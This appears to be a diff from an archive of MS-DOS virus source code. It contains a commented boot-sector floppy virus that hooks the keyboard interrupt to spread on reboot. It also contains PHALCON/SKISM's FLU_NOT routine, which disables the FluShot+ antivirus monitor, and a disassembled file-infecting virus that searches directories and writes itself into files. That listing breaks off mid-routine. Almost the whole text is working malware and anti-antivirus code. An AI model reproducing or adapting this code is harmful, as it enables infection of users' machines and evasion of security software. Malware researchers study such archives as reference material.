; write file cx=bytes, to ds:dx
mov al,ds:data_1e ; (0000:0200=0)
push es
pop ds
mov [di-4],si
mov [di],bp
or byte ptr [di-8],1Fh
push cs
pop ds
mov data_4,al ; (7415:0207=1Fh)
mov dx,8
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
or byte ptr es:[di-0Fh],40h ; '@'
jmp short loc_12 ; (02BE)
sub_4 endp
data_5 db 2Ah
seg_a ends
end start
MSDOS/F-Index/Virus.MSDOS.Unknown.floppy.asm
+380
View File
@@ -0,0 +1,380 @@
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety. ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory. It redirects the keyboard ;
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
; it will attempt to infect any floppy it finds in drive A:. ;
; It keeps the real boot sector at track 39, sector 8, head 0 ;
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus ;
; will die. It also contains no anti detection mechanisms as does the ;
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
; sector 9 because this is common to all floppy formats both single ;
; sided and double sided. It does not contain any malevolent TROJAN ;
; HORSE code. It does appear to contain a count of how many times it ;
; has infected other diskettes although this is harmless and the count ;
; is never accessed. ;
; ;
; Things to note about this virus: ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
; is its primary (only for that matter) means of reproduction to other ;
; floppy diskettes. The only way to remove it from an infected system ;
; is to turn the machine off and reboot an uninfected copy of DOS. ;
; It is even resident when no floppy is booted but BASIC is loaded ;
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
; it activates and infectes the floppy from which the user is ;
; attempting to boot. ;
; ;
; Also note that because of the POP CS command to pass control to ;
; its self in upper memory, this virus does not to work on 80286 ;
; machines (because this is not a valid 80286 instruction). ;
; ;
; The Norton Utilities can be used to identify infected diskettes by ;
; looking at the boot sector and the DOS SYS utility can be used to ;
; remove it (unlike the Pakistani Brain). ;
;-----------------------------------------------------------------------;
;
ORG 7C00H ;
;
TOS LABEL WORD ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there. (keeping same offset);
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
; 4. Jump to ourself at top of memory ;
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
;-----------------------------------------------------------------------;
BEGIN: CLI ;INITIALIZE STACK
XOR AX,AX ;
MOV SS,AX ;
MOV SP,offset TOS ;
STI ;
;
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
MOV DS,BX ;
MOV AX,[0013H] ;
MUL BX ;
SUB AX,07E0H ; (7C00H+512)/16
MOV ES,AX ;
;
PUSH CS ;DS = CS
POP DS ;
;
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
JNE B_10 ;
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
;
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
MOV DI,SI ;
MOV CX,512 ;
CLD ;
REP MOVSB ;
;
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
MOV CX,128 ;
REP MOVSB ;
;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
;
PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
NOP
;
PUSH DS ;DS=0 ; ES = DS
POP ES ;
;
MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
MOV CX,2708H ; TRACK 40, SECTOR 8
MOV AX,0201H ; READ SECTOR
INT 13H ; (common to 8/9 sect. 1/2 sided!)
JB $ ; HANG IF ERROR
;
JMP JMP_BOOT ;JMP 0000:7C00
;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR ;
; ;
; ON ENTRY: DS = 0 ;
; ES = WHERE TO SAVE OLD_09 & (HI) ;
; WHERE NEW_09 IS (HI) ;
;-----------------------------------------------------------------------;
PUT_NEW_09: ;
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
;
MOV SI,9*4 ;COPY INT 9 VECTOR TO
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
MOV CX,0004 ;
;
CLI ;
REP MOVSB ;
MOV Word Ptr [9*4],offset NEW_09
MOV [(9*4)+2],ES ;
STI ;
;
RET ;
;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
;-----------------------------------------------------------------------;
ACK_KEYBD: ;
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
MOV AH,AL ;
OR AL,80H ;
OUT 61H,AL ;
XCHG AL,AH ;
OUT 61H,AL ;
JMP RBOOT ;
;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
; REASON UNKNOWN ;
;-----------------------------------------------------------------------;
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
DB 27H,0,3,2 ;
DB 27H,0,4,2 ;
DB 27H,0,5,2 ;
DB 27H,0,6,2 ;
DB 27H,0,7,2 ;
DB 27H,0,8,2 ;
;
;A7C9A LABEL BYTE ;
DW 00024H ;NOT USED
DB 0ADH ;
DB 07CH ;
DB 0A3H ;
DW 00026H ;
;
;L7CA1: ;
POP CX ;NOT USED
POP DI ;
POP SI ;
POP ES ;
POP DS ;
POP AX ;
POPF ;
JMP 1111:1111 ;
;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ... ;
; IF ALT & CTRL & ? THEN ... ;
;-----------------------------------------------------------------------;
NEW_09: PUSHF ;
STI ;
;
PUSH AX ;
PUSH BX ;
PUSH DS ;
;
PUSH CS ;DS=CS
POP DS ;
;
MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
IN AL,60H ;GET SCAN CODE
MOV AH,AL ;SAVE IN AH
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
;
CMP AL,1DH ;IS IT A [CTRL]...
JNE N09_10 ;...JUMP IF NO
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
JMP N09_30 ;
;
N09_10: CMP AL,38H ;IS IT AN [ALT]...
JNE N09_20 ;...JUMP IF NO
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
JMP N09_30 ;
;
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
JNE N09_30 ;...JUMP IF NO
;
CMP AL,17H ;IF [I]...
JE N09_X0 ;...JUMP IF YES
CMP AL,53H ;IF [DEL]...
JE ACK_KEYBD ;...JUMP IF YES
;
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
;
N09_90: POP DS ;
POP BX ;
POP AX ;
POPF ;
;
DB 0EAH ;JMP F000:E987
OLD_09 DW ? ;
DW 0F000H ;
;
N09_X0: JMP N09_X1 ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
MOV AX,0800H ;AL=0, AH=DELAY ARG
OUT DX,AL ;
CALL DELAY ;
MOV [ALT_CTRL],AX ;AX=0 ;
;
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
INT 10H ;
MOV AH,2 ;SET CURSOR POS 0,0
XOR DX,DX ;
MOV BH,DH ; PAGE 0
INT 10H ;
;
MOV AH,1 ;SET CURSOR TYPE
MOV CX,0607H ;
INT 10H ;
;
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
CALL DELAY ;
;
CLI ;
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
;
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
MOV SI,offset BEGIN - 128 ;
MOV CX,128 ;
CLD ;
REP MOVSB ;
;
MOV DS,CX ;CX=0 ;DS=0
;
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
MOV [(19H*4)+2],CS ;
;
MOV AX,0040H ;DS = ROM DATA AREA
MOV DS,AX ;
;
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
;
PUSH DS ;IF BIOS F000:E502 == 21E4...
MOV AX,0F000H ;
MOV DS,AX ;
CMP Word Ptr [0E502H],21E4H ;
POP DS ;
JE R_90 ;
INT 19H ; IF NOT...REBOOT
;
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR ;
;-----------------------------------------------------------------------;
NEW_19: XOR AX,AX ;
;
MOV DS,AX ;DS=0
MOV AX,[0410] ;AX=EQUIP FLAG
TEST AL,1 ;IF FLOPPY DRIVES ...
JNZ N19_20 ;...JUMP
N19_10: PUSH CS ;ELSE ES=CS
POP ES ;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
INT 18H ;LOAD BASIC
;
N19_20: MOV CX,0004 ;RETRY COUNT = 4
;
N19_22: PUSH CX ;
MOV AH,00 ;RESET DISK
INT 13 ;
JB N19_81 ;
MOV AX,0201 ;READ BOOT SECTOR
PUSH DS ;
POP ES ;
MOV BX,offset BEGIN ;
MOV CX,1 ;TRACK 0, SECTOR 1
INT 13H ;
N19_81: POP CX ;
JNB N19_90 ;
LOOP N19_22 ;
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
;
;-----------------------------------------------------------------------;
; Reinfection segment. ;
;-----------------------------------------------------------------------;
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
JNZ RE_INFECT ;...RE INFECT
;
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
JMP 0000:7C00H ;
;
;-----------------------------------------------------------------------;
; Reinfection Segment. ;
;-----------------------------------------------------------------------;
RE_INFECT: ;
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
MOV CX,00E6H ; OURSELF
MOV DI,SI ;
PUSH CS ;
POP ES ;
CLD ;
REPE CMPSB ;
JE RI_12 ;IF NOT EQUAL...
;
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
;
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
MOV BX,offset TABLE ;FORMAT INFO
MOV DX,0000 ;DRIVE A: HEAD 0
MOV CH,40-1 ;TRACK 39
MOV AH,5 ;FORMAT
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
;
; <<< NO EXECUTION PATH TO HERE >>> ;
JB RI_80 ;
;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
MOV BX,offset BEGIN ;TRACK 40H
MOV CL,8 ;SECTOR 8
MOV AX,0301H ;WRITE 1 SECTOR
INT 13H ;
;
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
POP ES ;
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
;
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
MOV AX,0301 ;
INT 13H ;
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
;
RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
INT 19H ;...FLAG AND REBOOT
;
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
JMP JMP_BOOT ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
;
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
MOV BX,0040H ;
MOV DS,BX ;
MOV [0072H],AX ; 0040:0072 = RESET FLAG
JMP N09_90 ;
;
;-----------------------------------------------------------------------;
; DELAY ;
; ;
; ON ENTRY AH:CX = LOOP COUNT ;
;-----------------------------------------------------------------------;
DELAY: SUB CX,CX ;
D_01: LOOP $ ;
SUB AH,1 ;
JNZ D_01 ;
RET ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
A7DF4 DB 27H,00H,8,2
COUNTER_1 DW 001CH
ALT_CTRL DW 0
A7DFC DB 27H,0,8,2
MSDOS/F-Index/Virus.MSDOS.Unknown.flu_not.asm
+91
View File
@@ -0,0 +1,91 @@
; FLU_NOT.ASM þ Routines to be linked into your FluShot+ resistant
; þ programs.
; Version 1.0 þ 27 November 1991
;
; Written by Dark Angel and Demogorgon of PHALCON/SKISM Co-op
; Look for more Anti-Anti-Viral Utilities from us!
;
; Notes:
; This is different from the C routines. Call Flu_Not to disable and
; Flu_Restore to reenable (at the end of your program, of course). Try
; not to call Flu_Not more than once in your program. To disable again,
; simply use:
; les si, dword ptr flu_off
; mov es:[si], 593Ch
; (actually, this probably won't work in the .ASM file, but you can write
; the routine yourself and put it in this file.)
Public Flu_Not, Flu_Restore
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE
org 100h
flu_off dd 0
flu_seg dd 0
Flu_Not Proc Near
push ax
push bx
push bp
mov word ptr cs:[flu_seg], 0
mov ax, 0FF0Fh ; Check if FluShot+ resident
int 21h
cmp ax, 0101h
jnz No_puny_flus ; If not, no work to be done
Kill_Puny_Flus: ; Otherwise, find the
push es ; FluShot+ segment
xor ax, ax
mov es, ax
mov bx, 004Eh ; Get int 13h handler's
mov ax, es:[bx] ; segment
mov es, ax ; ES is now FSEG - YES!
mov bp, 1000h ; Start at FSEG:1000
Froopy_Loopy:
cmp word ptr es:[bp], 593Ch ; Try to find marker bytes
jz Happy_Loop ; NOTE: No need to set
inc bp ; counter because FluShot+
jmp Froopy_Loopy ; is guaranteed to be in
Happy_Loop: ; memory by the INT 21h call
cmp word ptr es:[bp], 'RP' ; Look backwards for the
jz Found_It_Here ; beginning of the function
dec bp
jmp Happy_Loop
; If you are paranoid, you can add other checks, such as
; (in Froopy_Loopy) cmp bp, 5000h, jz No_Puny_Flus and
; (in Happy_Loop) cmp bp, 1000h, jz No_Puny_Flus, but there
; is really no need.
Found_It_Here:
mov word ptr es:[bp], 0C3F8h ; Key to everything - replace
mov word ptr cs:[flu_seg], es ; function's starting bytes
mov word ptr cs:[flu_off], bp ; Save the flu_offset
pop es
No_Puny_Flus:
pop bp
pop bx
pop ax
ret
Flu_Not Endp
Flu_Restore Proc Near
push ax
push bx
push es
les bx, dword ptr cs:[offset flu_off] ; Load ES:BX with Seg:Off
mov ax, es
or ax, ax
jz No_FluShot
mov word ptr es:[bx], 5250h
No_FluShot:
pop es
pop bx
pop ax
ret
Flu_Restore Endp
CODE ENDS
END
MSDOS/F-Index/Virus.MSDOS.Unknown.flue.asm
+484
View File
@@ -0,0 +1,484 @@
1000:0000 Proc3:
1000:0000 cd 20 INT 20h ;Exit
1000:0079 Data37:
1000:0100 e4 40 Main: IN AL, 40h
1000:0102 86 e0 XCHG AH, AL
1000:0104 e4 40 IN AL, 40h
1000:0106 a3 a205 MOV WORD PTR [Data0], AX
1000:0109 be 1601 MOV SI, 0116h
1000:010c e8 8f04 CALL Proc0
1000:010f e9 0100 JMP Jmp0
1000:0112 db c3
1000:0113 Jmp0:
1000:0113 e8 8404 CALL Proc1
1000:0116 Data9:
1000:0116 e8 0000 CALL Proc2
1000:0119 Proc2:
1000:0119 5d POP BP
1000:011a 81 ed 1901 SUB BP, 0119h
1000:011e eb 01 JMP Jmp1
1000:0120 db 81
1000:0121 Jmp1:
1000:0121 e4 21 IN AL, 21h
1000:0123 0c 02 OR AL, 02h
1000:0125 e6 21 OUT AL, 21h
1000:0127 b9 0300 MOV CX, 0003h
1000:012a bf 0001 MOV DI, 0100h
1000:012d 57 PUSH DI
1000:012e 8d b6 5204 LEA SI, WORD PTR [BP+Data1]
1000:0132 fc CLD
1000:0133 f3 REPNZ
1000:0134 a4 MOVSB
1000:0135 b4 47 MOV AH, 47h
1000:0137 32 d2 XOR DL, DL
1000:0139 8d b6 ae04 LEA SI, WORD PTR [BP+Data2]
1000:013d cd 21 INT 21h ;Get current directory
1000:013f b4 2f MOV AH, 2fh
1000:0141 cd 21 INT 21h ;Get DTA
1000:0143 06 PUSH ES
1000:0144 53 PUSH BX
1000:0145 b8 2435 MOV AX, 3524h
1000:0148 cd 21 INT 21h ;Get int vector 0x24
1000:014a 3e
1000:014b 89 9e ee04 MOV WORD PTR DS:[BP+Data3], BX
1000:014f 3e
1000:0150 8c 86 f004 MOV WORD PTR DS:[BP+Data4], ES
1000:0154 0e PUSH CS
1000:0155 07 POP ES
1000:0156 fa CLI
1000:0157 b4 25 MOV AH, 25h
1000:0159 8d 96 4004 LEA DX, WORD PTR [BP+Data5]
1000:015d cd 21 INT 21h ;Set int vector 0x24
1000:015f fb STI
1000:0160 3e
1000:0161 83 be a205 00 CMP WORD PTR DS:[BP+Data6], 00h
1000:0166 75 03 JNZ Jmp2
1000:0168 e9 4602 JMP Jmp3
1000:016b Jmp2:
1000:016b b4 1a MOV AH, 1ah
1000:016d 8d 96 6104 LEA DX, WORD PTR [BP+Data11]
1000:0171 cd 21 INT 21h ;Set DTA
1000:0173 e8 b402 CALL Proc4
1000:0176 b1 05 MOV CL, 05h
1000:0178 d2 e8 SHR AL, CL
1000:017a fe c0 INC AL
1000:017c 3e
1000:017d 88 86 5104 MOV BYTE PTR DS:[BP+Data12], AL
1000:0181 Jmp7:
1000:0181 b4 4e MOV AH, 4eh
1000:0183 8d 96 5804 LEA DX, WORD PTR [BP+Data13]
1000:0187 eb 31 JMP Jmp5
1000:0189 db 90
1000:018a Jmp10:
1000:018a b8 0157 MOV AX, 5701h
1000:018d 3e
1000:018e 8b 8e 7704 MOV CX, WORD PTR DS:[BP+Data17]
1000:0192 3e
1000:0193 8b 96 7904 MOV DX, WORD PTR DS:[BP+Data18]
1000:0197 cd 21 INT 21h ;Get/set file timestamp
1000:0199 b4 3e MOV AH, 3eh
1000:019b cd 21 INT 21h ;Close file
1000:019d b8 0143 MOV AX, 4301h
1000:01a0 32 ed XOR CH, CH
1000:01a2 3e
1000:01a3 8a 8e 7604 MOV CL, BYTE PTR DS:[BP+Data19]
1000:01a7 8d 96 7f04 LEA DX, WORD PTR [BP+Data15]
1000:01ab cd 21 INT 21h ;Change file attributes
1000:01ad 3e
1000:01ae 80 be 5104 00 CMP BYTE PTR DS:[BP+Data12], 00h
1000:01b3 75 03 JNZ Jmp12
1000:01b5 e9 f901 JMP Jmp3
1000:01b8 Jmp12:
1000:01b8 b4 4f MOV AH, 4fh
1000:01ba Jmp5:
1000:01ba b9 0600 MOV CX, 0006h
1000:01bd cd 21 INT 21h ;Find file
1000:01bf 73 12 JNB Jmp6
1000:01c1 3e
1000:01c2 fe 86 5104 INC BYTE PTR DS:[BP+Data12]
1000:01c6 b4 3b MOV AH, 3bh
1000:01c8 8d 96 5e04 LEA DX, WORD PTR [BP+Data14]
1000:01cc cd 21 INT 21h ;Change directory
1000:01ce 73 b1 JNB Jmp7
1000:01d0 e9 de01 JMP Jmp3
1000:01d3 Jmp6:
1000:01d3 b8 0143 MOV AX, 4301h
1000:01d6 33 c9 XOR CX, CX
1000:01d8 8d 96 7f04 LEA DX, WORD PTR [BP+Data15]
1000:01dc cd 21 INT 21h ;Change file attributes
1000:01de b8 023d MOV AX, 3d02h
1000:01e1 cd 21 INT 21h ;Open file
1000:01e3 73 03 JNB Jmp8
1000:01e5 e9 c901 JMP Jmp3
1000:01e8 Jmp8:
1000:01e8 93 XCHG AX, BX
1000:01e9 83 fb 04 CMP BX, 04h
1000:01ec 77 03 JA Jmp9
1000:01ee e9 c001 JMP Jmp3
1000:01f1 Jmp9:
1000:01f1 3e
1000:01f2 89 9e 4f04 MOV WORD PTR DS:[BP+Data16], BX
1000:01f6 b4 3f MOV AH, 3fh
1000:01f8 b9 0300 MOV CX, 0003h
1000:01fb 8d 96 5204 LEA DX, WORD PTR [BP+Data1]
1000:01ff cd 21 INT 21h ;Read file
1000:0201 e8 0302 CALL Proc5
1000:0204 3d 73bb CMP AX, bb73h
1000:0207 73 81 JNB Jmp10
1000:0209 3d f401 CMP AX, 01f4h
1000:020c 73 03 JNB Jmp11
1000:020e e9 79ff JMP Jmp10
1000:0211 Jmp11:
1000:0211 3e
1000:0212 80 be 5204 e9 CMP BYTE PTR DS:[BP+Data1], e9h
1000:0217 75 0d JNZ Jmp13
1000:0219 3e
1000:021a 2b 86 5304 SUB AX, WORD PTR DS:[BP+Data20]
1000:021e 3d 9e04 CMP AX, 049eh
1000:0221 75 03 JNZ Jmp13
1000:0223 e9 64ff JMP Jmp10
1000:0226 Jmp13:
1000:0226 e8 0102 CALL Proc4
1000:0229 b1 06 MOV CL, 06h
1000:022b d3 e8 SHR AX, CL
1000:022d 50 PUSH AX
1000:022e e8 f901 CALL Proc4
1000:0231 92 XCHG AX, DX
1000:0232 33 c0 XOR AX, AX
1000:0234 8e d8 MOV DS, AX
1000:0236 b4 40 MOV AH, 40h
1000:0238 59 POP CX
1000:0239 cd 21 INT 21h ;Write file
1000:023b 0e PUSH CS
1000:023c 1f POP DS
1000:023d e8 c701 CALL Proc5
1000:0240 e8 e701 CALL Proc4
1000:0243 0b c0 OR AX, AX
1000:0245 75 03 JNZ Jmp14
1000:0247 e9 6701 JMP Jmp3
1000:024a Jmp14:
1000:024a 3e
1000:024b 89 86 a205 MOV WORD PTR DS:[BP+Data6], AX
1000:024f 3e
1000:0250 89 9e 8105 MOV WORD PTR DS:[BP+Data21], BX
1000:0254 b9 2600 MOV CX, 0026h
1000:0257 8d b6 7405 LEA SI, WORD PTR [BP+Data22]
1000:025b 8d be ad05 LEA DI, WORD PTR [BP+Data8]
1000:025f fc CLD
1000:0260 f3 REPNZ
1000:0261 a4 MOVSB
1000:0262 e8 b701 CALL Proc6
1000:0265 d0 e8 SHR AL, 1
1000:0267 3c 02 CMP AL, 02h
1000:0269 72 1f JB Jmp15
1000:026b 77 3a JA Jmp16
1000:026d 3e
1000:026e c6 86 9b05 e3 MOV BYTE PTR DS:[BP+Data23], e3h
1000:0273 3e
1000:0274 c6 86 9d05 37 MOV BYTE PTR DS:[BP+Data24], 37h
1000:0279 3e
1000:027a c7 86 a405 3104 MOV WORD PTR DS:[BP+Jmp4], 0431h
1000:0280 3e
1000:0281 c7 86 a805 4646 MOV WORD PTR DS:[BP+Data25], 4646h
1000:0287 eb 38 JMP Jmp17
1000:0289 db 90
1000:028a Jmp15:
1000:028a 3e
1000:028b c6 86 9b05 e7 MOV BYTE PTR DS:[BP+Data23], e7h
1000:0290 3e
1000:0291 c6 86 9d05 1d MOV BYTE PTR DS:[BP+Data24], 1dh
1000:0296 3e
1000:0297 c7 86 a405 3107 MOV WORD PTR DS:[BP+Jmp4], 0731h
1000:029d 3e
1000:029e c7 86 a805 4343 MOV WORD PTR DS:[BP+Data25], 4343h
1000:02a4 eb 1b JMP Jmp17
1000:02a6 db 90
1000:02a7 Jmp16:
1000:02a7 3e
1000:02a8 c6 86 9b05 e6 MOV BYTE PTR DS:[BP+Data23], e6h
1000:02ad 3e
1000:02ae c6 86 9d05 3c MOV BYTE PTR DS:[BP+Data24], 3ch
1000:02b3 3e
1000:02b4 c7 86 a405 3105 MOV WORD PTR DS:[BP+Jmp4], 0531h
1000:02ba 3e
1000:02bb c7 86 a805 4747 MOV WORD PTR DS:[BP+Data25], 4747h
1000:02c1 Jmp17:
1000:02c1 e8 5801 CALL Proc6
1000:02c4 3c 04 CMP AL, 04h
1000:02c6 72 1c JB Jmp18
1000:02c8 3e
1000:02c9 80 be 9a05 46 CMP BYTE PTR DS:[BP+Proc1], 46h
1000:02ce 72 08 JB Jmp19
1000:02d0 77 0c JA Jmp20
1000:02d2 3c 05 CMP AL, 05h
1000:02d4 75 62 JNZ Jmp21
1000:02d6 eb e9 JMP Jmp17
1000:02d8 Jmp19:
1000:02d8 3c 04 CMP AL, 04h
1000:02da 75 47 JNZ Jmp24
1000:02dc eb e3 JMP Jmp17
1000:02de Jmp20:
1000:02de 3c 06 CMP AL, 06h
1000:02e0 75 6b JNZ Jmp23
1000:02e2 eb dd JMP Jmp17
1000:02e4 Jmp18:
1000:02e4 3c 02 CMP AL, 02h
1000:02e6 72 17 JB Jmp25
1000:02e8 77 24 JA Jmp26
1000:02ea 3e
1000:02eb c6 86 a105 ba MOV BYTE PTR DS:[BP+Data26], bah
1000:02f0 3e
1000:02f1 80 86 a505 10 ADD BYTE PTR DS:[BP+Data27], 10h
1000:02f6 3e
1000:02f7 c6 86 a705 d2 MOV BYTE PTR DS:[BP+Data28], d2h
1000:02fc eb 61 JMP Jmp22
1000:02fe db 90
1000:02ff Jmp25:
1000:02ff 3e
1000:0300 c6 86 a105 b8 MOV BYTE PTR DS:[BP+Data26], b8h
1000:0305 3e
1000:0306 c6 86 a705 d0 MOV BYTE PTR DS:[BP+Data28], d0h
1000:030b eb 52 JMP Jmp22
1000:030d db 90
1000:030e Jmp26:
1000:030e 3e
1000:030f c6 86 a105 bd MOV BYTE PTR DS:[BP+Data26], bdh
1000:0314 3e
1000:0315 80 86 a505 28 ADD BYTE PTR DS:[BP+Data27], 28h
1000:031a 3e
1000:031b c6 86 a705 d5 MOV BYTE PTR DS:[BP+Data28], d5h
1000:0320 eb 3d JMP Jmp22
1000:0322 db 90
1000:0323 Jmp24:
1000:0323 3e
1000:0324 c6 86 a105 bb MOV BYTE PTR DS:[BP+Data26], bbh
1000:0329 3e
1000:032a 80 86 a505 18 ADD BYTE PTR DS:[BP+Data27], 18h
1000:032f 3e
1000:0330 c6 86 a705 d3 MOV BYTE PTR DS:[BP+Data28], d3h
1000:0335 eb 28 JMP Jmp22
1000:0337 db 90
1000:0338 Jmp21:
1000:0338 3e
1000:0339 c6 86 a105 be MOV BYTE PTR DS:[BP+Data26], beh
1000:033e 3e
1000:033f 80 86 a505 30 ADD BYTE PTR DS:[BP+Data27], 30h
1000:0344 3e
1000:0345 c6 86 a705 d6 MOV BYTE PTR DS:[BP+Data28], d6h
1000:034a eb 13 JMP Jmp22
1000:034c db 90
1000:034d Jmp23:
1000:034d 3e
1000:034e c6 86 a105 bf MOV BYTE PTR DS:[BP+Data26], bfh
1000:0353 3e
1000:0354 80 86 a505 38 ADD BYTE PTR DS:[BP+Data27], 38h
1000:0359 3e
1000:035a c6 86 a705 d7 MOV BYTE PTR DS:[BP+Data28], d7h
1000:035f Jmp22:
1000:035f 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:0363 8b fe MOV DI, SI
1000:0365 8b de MOV BX, SI
1000:0367 55 PUSH BP
1000:0368 e8 3302 CALL Proc0
1000:036b 5d POP BP
1000:036c b8 0042 MOV AX, 4200h
1000:036f 3e
1000:0370 8b 9e 4f04 MOV BX, WORD PTR DS:[BP+Data16]
1000:0374 33 c9 XOR CX, CX
1000:0376 33 d2 XOR DX, DX
1000:0378 cd 21 INT 21h ;Seek on file
1000:037a b4 40 MOV AH, 40h
1000:037c b9 0300 MOV CX, 0003h
1000:037f 8d 96 5504 LEA DX, WORD PTR [BP+Data29]
1000:0383 cd 21 INT 21h ;Write file
1000:0385 b8 00b8 MOV AX, b800h
1000:0388 8e c0 MOV ES, AX
1000:038a 8e d8 MOV DS, AX
1000:038c 33 f6 XOR SI, SI
1000:038e 33 ff XOR DI, DI
1000:0390 b9 1800 MOV CX, 0018h
1000:0393 51 PUSH CX
1000:0394 b9 5000 MOV CX, 0050h
1000:0397 ad LODSW
1000:0398 50 PUSH AX
1000:0399 e2 fc LOOP Data30
1000:039b b9 5000 MOV CX, 0050h
1000:039e 58 POP AX
1000:039f ab STOSW
1000:03a0 e2 fc LOOP Data31
1000:03a2 59 POP CX
1000:03a3 e2 ee LOOP Data32
1000:03a5 0e PUSH CS
1000:03a6 0e PUSH CS
1000:03a7 1f POP DS
1000:03a8 07 POP ES
1000:03a9 3e
1000:03aa fe 8e 5104 DEC BYTE PTR DS:[BP+Data12]
1000:03ae e9 d9fd JMP Jmp10
1000:03b1 Jmp3:
1000:03b1 8d b6 ce03 LEA SI, WORD PTR [BP+Data7]
1000:03b5 8d be ad05 LEA DI, WORD PTR [BP+Data8]
1000:03b9 b9 3900 MOV CX, 0039h
1000:03bc fc CLD
1000:03bd f3 REPNZ
1000:03be a4 MOVSB
1000:03bf 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:03c3 8b fe MOV DI, SI
1000:03c5 8b de MOV BX, SI
1000:03c7 b9 c901 MOV CX, 01c9h
1000:03ca 55 PUSH BP
1000:03cb e9 d601 JMP Jmp4
1000:03ce Data7:
1000:03ce db 5d,b8,24,25,3e,8b,96,f0,04,8e,da,3e,8b,96,ee,04,cd,21,b4,1a
1000:03e2 db 5a,1f,cd,21,0e,1f,b4,3b,8d,96,ad,04,cd,21,e4,21,24,fd,e6,21
1000:03f6 db 33,c0,33,db,33,c9,33,d2,33,ed,be,00,01,bf,00,01,c3
1000:0407 Proc5:
1000:0407 b8 0242 MOV AX, 4202h
1000:040a 33 c9 XOR CX, CX
1000:040c 33 d2 XOR DX, DX
1000:040e cd 21 INT 21h ;Seek on file
1000:0410 2d 0300 SUB AX, 0003h
1000:0413 3e
